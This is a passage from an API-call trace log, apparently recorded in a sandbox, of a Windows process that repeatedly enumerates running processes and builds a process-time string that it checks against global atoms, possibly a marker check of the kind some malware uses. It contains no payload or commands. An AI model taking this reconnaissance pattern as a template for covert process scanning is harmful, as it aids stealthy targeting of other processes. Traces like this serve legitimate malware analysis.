	[0103.792] CloseHandle (hObject=0x694) returned 1
	[0103.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0103.792] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.792] CloseHandle (hObject=0x694) returned 1
	[0103.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0103.793] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.793] CloseHandle (hObject=0x694) returned 1
	[0103.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0103.793] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.793] CloseHandle (hObject=0x694) returned 1
	[0103.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0103.793] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.793] CloseHandle (hObject=0x694) returned 1
	[0103.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0103.793] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.793] CloseHandle (hObject=0x694) returned 1
	[0103.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0103.793] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.793] CloseHandle (hObject=0x694) returned 1
	[0103.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0103.794] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.794] CloseHandle (hObject=0x694) returned 1
	[0103.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0103.794] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.794] CloseHandle (hObject=0x694) returned 1
	[0103.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0103.794] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.794] CloseHandle (hObject=0x694) returned 1
	[0103.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0103.795] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.795] CloseHandle (hObject=0x694) returned 1
	[0103.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0103.795] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.795] CloseHandle (hObject=0x694) returned 1
	[0103.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0103.795] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.795] CloseHandle (hObject=0x694) returned 1
	[0103.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0103.795] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.795] CloseHandle (hObject=0x694) returned 1
	[0103.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0103.795] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.795] CloseHandle (hObject=0x694) returned 1
	[0103.796] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0103.796] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.796] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0103.796] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0103.796] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0103.797] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.797] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0103.797] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.797] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0103.797] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0103.797] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0103.797] CloseHandle (hObject=0x694) returned 1
	[0103.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0103.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0103.798] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.798] CloseHandle (hObject=0x694) returned 1
	[0103.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0103.798] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.798] CloseHandle (hObject=0x694) returned 1
	[0103.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0103.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0103.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0103.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0103.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0103.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0103.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0103.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0103.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0103.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0103.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0103.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0103.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0103.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0103.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0103.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0103.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0103.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0103.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0103.833] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.834] CloseHandle (hObject=0x694) returned 1
	[0103.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0103.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0103.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0103.834] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.834] CloseHandle (hObject=0x694) returned 1
	[0103.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0103.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0103.834] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.834] CloseHandle (hObject=0x694) returned 1
	[0103.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0103.834] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.835] CloseHandle (hObject=0x694) returned 1
	[0103.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0103.835] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.835] CloseHandle (hObject=0x694) returned 1
	[0103.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0103.835] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.835] CloseHandle (hObject=0x694) returned 1
	[0103.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0103.835] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.835] CloseHandle (hObject=0x694) returned 1
	[0103.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0103.835] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.835] CloseHandle (hObject=0x694) returned 1
	[0103.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0103.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0103.836] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.836] CloseHandle (hObject=0x694) returned 1
	[0103.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0103.836] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.836] CloseHandle (hObject=0x694) returned 1
	[0103.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0103.836] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.836] CloseHandle (hObject=0x694) returned 1
	[0103.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0103.837] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.837] CloseHandle (hObject=0x694) returned 1
	[0103.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0103.837] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.837] CloseHandle (hObject=0x694) returned 1
	[0103.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0103.837] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.837] CloseHandle (hObject=0x694) returned 1
	[0103.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0103.837] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.837] CloseHandle (hObject=0x694) returned 1
	[0103.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0103.837] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.837] CloseHandle (hObject=0x694) returned 1
	[0103.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0103.838] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.838] CloseHandle (hObject=0x694) returned 1
	[0103.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0103.838] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.838] CloseHandle (hObject=0x694) returned 1
	[0103.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0103.838] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.838] CloseHandle (hObject=0x694) returned 1
	[0103.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0103.838] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.838] CloseHandle (hObject=0x694) returned 1
	[0103.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0103.839] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.839] CloseHandle (hObject=0x694) returned 1
	[0103.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0103.839] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.839] CloseHandle (hObject=0x694) returned 1
	[0103.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0103.839] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.839] CloseHandle (hObject=0x694) returned 1
	[0103.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0103.839] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.839] CloseHandle (hObject=0x694) returned 1
	[0103.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0103.839] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.840] CloseHandle (hObject=0x694) returned 1
	[0103.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0103.840] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.840] CloseHandle (hObject=0x694) returned 1
	[0103.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0103.840] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.840] CloseHandle (hObject=0x694) returned 1
	[0103.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0103.840] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.840] CloseHandle (hObject=0x694) returned 1
	[0103.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0103.840] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.840] CloseHandle (hObject=0x694) returned 1
	[0103.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0103.840] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.841] CloseHandle (hObject=0x694) returned 1
	[0103.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0103.841] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.841] CloseHandle (hObject=0x694) returned 1
	[0103.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0103.841] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.841] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0103.841] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0103.842] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0103.842] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.842] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0103.842] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.842] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0103.842] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0103.842] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0103.843] CloseHandle (hObject=0x694) returned 1
	[0103.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0103.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0103.843] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.843] CloseHandle (hObject=0x694) returned 1
	[0103.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0103.843] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.843] CloseHandle (hObject=0x694) returned 1
	[0103.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0103.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0103.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0103.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0103.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0103.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0103.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0103.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0103.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0103.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0103.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0103.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0103.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0103.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0103.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0103.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0103.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0103.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0103.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0103.898] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.898] CloseHandle (hObject=0x694) returned 1
	[0103.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0103.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0103.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0103.898] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.898] CloseHandle (hObject=0x694) returned 1
	[0103.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0103.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0103.898] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.899] CloseHandle (hObject=0x694) returned 1
	[0103.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0103.899] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.899] CloseHandle (hObject=0x694) returned 1
	[0103.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0103.899] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.899] CloseHandle (hObject=0x694) returned 1
	[0103.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0103.899] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.899] CloseHandle (hObject=0x694) returned 1
	[0103.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0103.899] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.899] CloseHandle (hObject=0x694) returned 1
	[0103.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0103.900] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.900] CloseHandle (hObject=0x694) returned 1
	[0103.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0103.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0103.900] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.900] CloseHandle (hObject=0x694) returned 1
	[0103.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0103.900] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.900] CloseHandle (hObject=0x694) returned 1
	[0103.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0103.900] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.900] CloseHandle (hObject=0x694) returned 1
	[0103.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0103.900] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.900] CloseHandle (hObject=0x694) returned 1
	[0103.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0103.901] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.901] CloseHandle (hObject=0x694) returned 1
	[0103.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0103.901] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.901] CloseHandle (hObject=0x694) returned 1
	[0103.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0103.901] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.901] CloseHandle (hObject=0x694) returned 1
	[0103.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0103.901] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.901] CloseHandle (hObject=0x694) returned 1
	[0103.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0103.902] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.902] CloseHandle (hObject=0x694) returned 1
	[0103.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0103.902] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.902] CloseHandle (hObject=0x694) returned 1
	[0103.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0103.902] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.902] CloseHandle (hObject=0x694) returned 1
	[0103.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0103.902] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.902] CloseHandle (hObject=0x694) returned 1
	[0103.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0103.902] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.902] CloseHandle (hObject=0x694) returned 1
	[0103.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0103.903] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.903] CloseHandle (hObject=0x694) returned 1
	[0103.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0103.903] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.903] CloseHandle (hObject=0x694) returned 1
	[0103.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0103.903] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.903] CloseHandle (hObject=0x694) returned 1
	[0103.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0103.903] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.903] CloseHandle (hObject=0x694) returned 1
	[0103.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0103.903] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.903] CloseHandle (hObject=0x694) returned 1
